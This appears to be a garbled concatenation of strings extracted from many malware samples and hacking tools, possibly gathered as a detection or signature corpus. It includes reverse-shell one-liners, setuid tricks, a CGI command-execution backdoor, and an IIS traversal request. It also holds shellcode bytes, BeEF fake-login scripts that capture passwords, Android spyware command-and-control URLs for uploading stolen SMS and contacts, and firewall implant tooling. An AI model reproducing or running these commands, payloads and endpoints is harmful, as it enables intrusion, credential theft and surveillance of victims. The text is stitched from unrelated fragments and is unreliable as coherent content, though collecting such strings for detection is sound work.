22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . \"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 whoami & hostname & ipconfig /allnet user /domain 2>&1 & net group /domain 2>&1net group \"domain admins\" /domain 2>&1 & (get-content $env:public\\libraries\\dns.ps1) -replace ('#'+'##'),$botid | set-content $env:public\\libraries\\dns.ps1invoke-expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')('00000000'+(convertto-base36(get-random -maximum 46655)))flash.media.sound()call kernel32!virtualalloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40){4d36e972-e325-11ce-bfc1-08002be10318}netstreamzhoupin exploit crewzhopin exploit crewbackdoorloggerzhuaddresspcap_dump_openresolving ips to poison...warnning: gateway ip can not be found%s-%02d%02d%02d%02d%02d.rc:\\users\\%s\\appdata\\cookies\\n
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 wsocketresolvehost: cannot convert host address '%s'tcp is the only protocol supported thru socks serverdarkknightipstealerutilities td class=\"summo1\">rem'ebaqrisecorexitprocess'msc#eauto scroll both text boxesstart/stop portscanningauto save logfile by pressing stopget /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir http/1.0c:\\program files\\microsoft visual studio\\vb98\\vb6.olbdwgetaddressforobjectcolor transfer settingsfx global lighting angleversion compatibility infonew windows thumbnaillayer id generator basecolor halftone settingsc:\\windows\\system\\mswinsck.ocadarkpain=bitchin threads)pumb_syj&,farw>yrm3hm3t_rullaz7projectc1ten-ggl\"/moziqlxa0 :scan begun on port:0 :portscan ready.corrupt data!k4p~omkizdlltrojanscangetdllinfocompressed by petite (c)1999 ian luck.getfilecrc32gettrojannumbertfakaboutbasic portscannernow scanning port:this program was made by volker vossjiboo~ssbexample: iis 10.10.10.10send error<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>this tool may be used only by system administrators. i am not responsible for _h/enumdisplay/ected.msvcrt0xnotsupported7neowait.exerrrrrrrwip.txtxiaoyuers
1 view mcpvreadvarpercon as select variableid,variabletypeid,formatfitting,scaleid,variablename,addressparameter,protokoll,maxlimis
1 get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
1 getprocaddressy`
74 getprocaddress
1 address: 0x
1 d:\\codespace\\powerock\\exp\\afdpre\\bin\\afdpre.pdbguiwang!@#9bd*-a add user(admin$/guiwang!@#9bd*) to admin[err] get haltable addresss fail[err] get zwdeviceiocontrolfile fail[err] get native function pointers fail
1 address: 0xs4u.exe domain\\username [extra sid]\\release\\s4u.pdbcreateprocessasuser failed (error %u).gettokeninformation failed (error: %u).lsalogonuser failed (error 0x%x).lsalogonuser: ok, logonid: 0x%x-0x%xlookupprivilegevalue failed (error: %u).the token does not have the specified privilege (%s).unable to parse command line.unable to find logon sid.adjusttokenprivileges failed (error: %u).adjusttokenprivileges (%s): oks
1 load auxiliary object=%s requested by file=%ssize of new packet, should be %d <= size <= %d bytesverbosity - show lengths, packet dumps, etc%s: error while loading shared libraries: %s%s%s%s%scannot dynamically load executablebinding file %s to %s: %s symbol `%s' [%s]randomize the initiator cookievalid commands are: smac, dmac, int, pack, done, goinvalid format suggest dmac=00:00:00:00:00:00smac=%02x:%02x:%02x:%02x:%02x:%02xnot everything is set yet%d - %d, %d%d - %lu.%lu %d.%lu%d - %d %d*** target may be susceptible to falsemorel ****** target is susceptible to falsemorel ***if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))$ans=\"$srcip:$srcport -> $dstip:$dstport\";return \"error:$line is not a valid port\";$dstport=hextoport($dstport);sub hextoport$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;return \"error:$line is not a valid address\";print \"error: the filename or hex representation needs to be one argument try using \\\"'s\\n\";push(@octets,$byte_table{$tempi});print hextoip($argv[0]);generates the persistence file name and prints it out.name: a hostname: 'host.network.com', a decimal numeric offset within-a www.badguy.net,cname,1800,host.badguy.net \\\\what is the name of your pbd:you are now ready for a screamplowbinstore enabled implants.active connections will be maintained for this tunnel. timeout:%s: compatible with blatsting version 1.2can't find target version module!class payload:connection timed out. only a problem if the callback was not received.could not reliably detect cookie. using 'session_id'...def build_exploit_payload(self,cmd=\"/tmp/httpd\"):self.build_exploit_payload(cmd).got_loader_start_textimplantkeepgoingupgrade_implantunable to save off predefinedscans directoryre-orders the networkprofiler scans so they show up in order in the lpfailed to create version-specific payload(are you sure you did \"make [version]\" in versions?)-s/--srcip <sourceip> use given source ip (if sniffer doesn't collect source ip)convert an xml file generated by the blatsting sniffer module into a pcap capture file.(might have to delete key in ~/.ssh/known_hosts on linux box)scp bglee-should be 4bfe94b1 for clean bootloader version 3.0; scp <configured implant> <username>@<ipaddr>:onfigerror: failed to open %s: %d__libc_start_main@@glibc_2.0serial number: %sstrerror@@glibc_2.0error: mmap failed: %dsd_processcontrolpacketencryption_rc4setkey^get.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nthis program will configure a jetplow userarea file.error running config_implant.note: it assumes you are operating in the install/lp/jp directory. this assumption first ip address for beacon destination [127.0.0.1]are you sure? don't forget that netscreen firewalls require bananaliar!! loadedpagetable.chandler_readbiosmacdef init > /tmp/.netrc;/usr/bin/wget http://home=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_namewhat is the name of your implant:killall thttpdcopy http://<ip>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
1 @stego:syswrite(stdout, \"content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(stdout, \"\\r\\n</pre></html>\\r\\n\", 17);open(stderr, \">&stdout\") || die \"can't redirect stderr\";$_ = $env{query_string};$execthis = $_;system($execthis);s/%2f/\\//ig;<form action=\"changepwd.asp\" method=\"post\"> set ouser = getobject(\"winnt://computername/\" & username) value=\"<%=request.servervariables(\"login_user\")%>\"> windows 2000 oldpwd = request.form(\"oldpwd\") newpwd2 = request.form(\"newpwd2\") newpwd1 = request.form(\"newpwd1\") made to port 80 of the remote machine at 192.168.1.101 with theunable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s - outbound source port numberattempting to connect to %s port %dusage: concon \\\\ip\\sharename\\con\\conexitcode = oshell.run(\"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, oshell.run \"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, falseechob(\"regsvr32.exe exitcode = \" & exitcode)public property get ofs()cleanip - specify ip address which you want clear.logfile - specify log file which you want process.cleaniislog vermsftpsvcfatal error: mfc initialization failedspecified \"all\" will process all log files.specified \".\" will clean all ip record.service %s stopped.process log file %s...power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"sqlcheck can only scan a class b network. try again.example: sqlcheck 192.168.0.1 192.168.0.254usage: sqlcheck <startip> <endip>runasex by assassin 2000. all rights reserved. http://www.netxeyes.comnote: this program can'nt run with local machine.%s execute succussifully.usage: runasex <username> <password> <execute file> [\"execute option\"]creation of results file - \"%s\" failed.c:\\>nbtdump remote-machinecerberus nbtdump<center><h1>cerberus internet scanner</h1><
1 ./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=na -p 22 -t target_ip, --target_ip=target_ip -- either 127.0.0.1 or win ops ip./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport rhp --dport rhp--target_vers=target_vers target pix version (pix712, asa804) (required)-p dest_port, --dest_port=dest_port defaults: telnet=23, ssh=22 (optional) - change to local redirect portthis operation is complete, bananaglee willcd /current/bin/fw/bgxxxx/install/lpprofprocesspacketgettimeslotcmdhandlergetipipcmdhandlerprofstartscantmpdata.1resetcmdhandlercd /current/bin/fw/bananaglee/$bgver/install/lp/jetplow***** please place your ua in /current/bin/fw/ops *****ln -s ../jp/orig_code.bin orig_code_pixgen.bin***** welcome to jetplow *****get_lsl_interfacesencryptfc4payloadbeacon_getconfigformbeaconpacketbeacon_reconfiguredumpconfiggetstatushandlerxtractdatato disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dcould not connect to target device: %s:%d. please check ip address.command data size is invalid for an exec cmda script was specified but target is not a ppc405-based netscreen (ns5xt, ns25, and ns50). executing scripts is supported but maexecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] execute code.execute 0x%08x with args (%08x): [y/n]dump_value_lhash_doall_argeggcode is complete. pass execution to it? [y/n]required by seconddatehelp='output file name (optional). by default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readflashhandlerflashrtnspix6x.cfix_ip_cksum_incrwriteflashhandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesdlt %d is not one of the dlts supported by this deviceusage: storefc.py --configfile=<path to xml file> --implantfile=<path to binstore implant> [--outputfile=<file to write the confraise exception, \"must supply both a config file and implant file.\"this is wrapper for store.py that felonycrowbar will use. thisdef hexdump(x,lead=\"[+] \",out=sys.stdout):print >>out, \"%s%04x \" % (lead,i),print >>out, \"%02x\" % ord(x[i+j]),print >>out, sane(x[i:i+16])components/modules/biosmodule/implant/e28f6/../e28f640j3_asm.scmosreadbytechecksumareaconfirmed.0writespeedplow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. if you want to uninstall,the active module(s) on the target are not meant to be persistedlp.c:pixsecurity - improper number of bytes read in security/interface informationlp.c:pixsecurity - not in sessiongetmodinterface__preloadedmodulesshowcommandsreadmoduleinterfacewrapping_not_necessary_or_wrapping_okget_cmd_listlp_listen2killcmdlistmodule and implant versions do not match. this module is not compatible with the target implant%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.log%s/bf_%04d%02d%02d.log%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.bin* not attempting to execute \"%s\" commandterminating script (command error or \"quit\" encountered)execute code in <file> passing <argx> (hex)* use arrow keys to scroll through command historypitcmd_processcmdlineexecute all commands in <file>__processshellcmdpittarget_getdstport__processsettargetiplogging commands and output - onthis command is too dangerous. if you'd like to run it, contact the development teamimplant version-specific values:this function should not be used with a netscreen, something has gone horribly wrongcreatesendrecv: recv'd an error from the target.error: watchdogtimeout read returned %d instead of 4command has not yet been codedbeacon domain : www.%s.comthis command can only be run on a pix/asawarning! bad or missing flash values (in section 2 of .dat file)printing the interface info and security levels. pix only.incomplete and must be removed manually.)%s: recv'd an error from the target.unable to fetch the address to the get_uptime_secs function for this os versionupload/activate/de-activate/remove/cmd function faileddo you wish to activate the implant that is already on the firewall? (y/n): there is no implant present on the firewall.implant version :%lx%lx%lxyou may now connect to the implant using the pbd idkeyno reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcpbd_getversionpbd/pbdencrypt.binpbd/pbdgetversion.pktpbd/pbdstartwrite.binpbd/pbd_setnewhookpt.pktpbd/pbd_upload_singlepkt.pktunable to fetch hook and jmp addresses for this os versioncould not get hook and jump addressesenter the name of a clean implant binary (not an image):unable to read dat file for os version 0x%08lxinvalid implant fileprint \"[+] connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"must be overriden if the target will be touched. base implementation should not be called.\")@overridable(\"must be overriden. base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateflingonexception:print \"[-] keyboard interrupt before response received\"if self.terminateflingonexception:print 'debug info ','='*40modules persistence file written successfullymodules persistence data successfully removedno modules are active on the firewall, nothing to persisterror while attemping to persist modules:error while reading interface info from pixlp.c:pixfree - failed to get responsewarning: lp timeout specified (%lu seconds) less than default (%u seconds). setting defaultunable to fetch config address for this os versionlp.c: interface information not available for this session[%s:%s:%d] error: extract_fgbgwarning: session may not have been closed!exec packet processedfailed to insert the command into command list.send_packet: trying to send too much data.payloadlength >= max_allow_size.wrong payload sizeunknown packet received......returned eax = %08xlogging.error(\" perhaps you should run with --scan?\")logging.error(\"error: no entry for etag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - epba: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - epba: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
1 app.stream-media.netfile %s does'nt exist or is forbidden to acess!getprocessaddresss of phttpqueryinfoa failed!connect %s error!download file %s successfully!index.tmpexecute pe successfullyaa/22/success.xmlaa/22/index.aspfile %s a non-pe filesendrequset error!filelist[%d]=%shttp://update.konamidata.com/test/zl/sophos/td/result/rz.dat?http://update.konamidata.com/test/zl/sophos/td/index.dat?internet connect error:%dproxy-authorization:basichttpqueryinfo failed:%dread file error:%ddowndll.dllinvalid urlcreate file failedmyagent%s%s%d%davaliable data:%u bytesthe procedure entry point %s could not be located in the dynamic link library %spsapi.dllwinhttpgetproxyforurlw
1 ctfmon.exed:\\0.work\\0.coding\\0.workspace\\downloader\\release[proto] [local address] [l port] [remote address] [r port] [state]last-error code\x000h
1 http://www.wzpg.comipsearcher\\ipsearcher\\release\\ipsearcher.pdb_getaddressipsearcher.dlldojibiron by ronald huizer, (c) master#h4cker.us [%s]: found \"ftp account: anyone/anyone@any.net\" !!!%s@ftpscan#cracked account: %s/%s[%s]: found \"ftp account: %s/%s\" !!![>] ms11-08 exploit\\epathobj_exp\\x64\\release\\epathobj_exp.pdb-
1 c:\\projects\\greaterdoctor\\trunk\\greaterdoctorsrc\\build\\release\\dllconfig\\dllconfig.pdbgreaterdoctor [ commandline args configuration ]-useage: <scanner> \"<cmdline args>\"+daemon_version,system,processor,refid,clockusage: %s typeofscan ip_address# scanning ip %d.%d.%d.%d***** %s ***** (length %d)d$7p
1 recoder : houdini (c) skype : houdini-fx'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=response = post (\"is-ready\",\"\")execute failed!execute success!execute success]sres=%ssmac=x-down(x-downonly(x-exec(x-delay(d:\\p\\win\\release\\win.pdbd:\\p\\win\\release\\s4.pdbcmdshell.secloginedquerytimeripaddress=%d.%d.%d.%d%s%s%02x-%02x-%02x-%02x-%02x-%02xcommand.comosversion=%slogined=%cmainfilename=%s
1 /tmp/tmpaddressbook.vcf
1 http://www.foundstone.com%s %s port %d. address is already in usew03a2409.dllr
1 k%02u:%02u:%02u.%03u-%4u: * privateencrypt -> publicdecrypt failedselect processid,description,executablepath from win32_process~debl00l.tmp\\\\.\\mailslot\\c54321\\\\.\\mailslot\\c12345nowmutexsystem\\currentcontrolset\\services\\msexchangeis\\parametersprivate000000005017c31b7c7bcf97ec86019f5026be85fd1fb192f6f4237b78db12e7dffb07748bff6432b3870681d54bef44077487044681fb94d17ed04217145b9800000000e2c9adbd8f470c7320d28000353813757f58860e90207f8874d2eb49851d3d3115a210da6475ccfc111dcc05e4910e50071975f61972dce345e89d88usage: %s -i inputfile -o outputfile [-f functionordinal] [-a functionargument] [-t threadoption]the output payload \"%s\" has a size of %d-bytes.error: fwrite(%s) failed on ucpayloadload and execute implant within the existing threaddriver startdeviceiocontrol error: %dphlookusage: setouraddr <input file> <output file> <protocol> [ip/ipx address]replaced default ip address (127.0.0.1) with local ip address %d.%d.%d.%d\
1 s ip is : %smozilla/4.0 ( compatible; msie 7.0; aol 8.0 )users\\parviz\\documents\\username=user-001web=1mail=1ftp=0ipaddresslow=78.109.194.1143.03
1 getting portname/identifier failed - %xserialadddevice - error creating new devobj [%#08lx]external naming failed - status %x------- same multiport - different interrupts%x occurred prior to the wait - starting the'user registry info - userportindex: %dcould not report legacy device - %xentering serialgetportinfo'user registry info - userport: %xioopendeviceregistrykey failed - %x kernel debugger is using port at address %xrelease - freeing multi contextserial driver will not load port'user registry info - useraddressspace: %dserialadddevice: enumeration request, returning no_more_entries'user registry info - userindexed: %d\
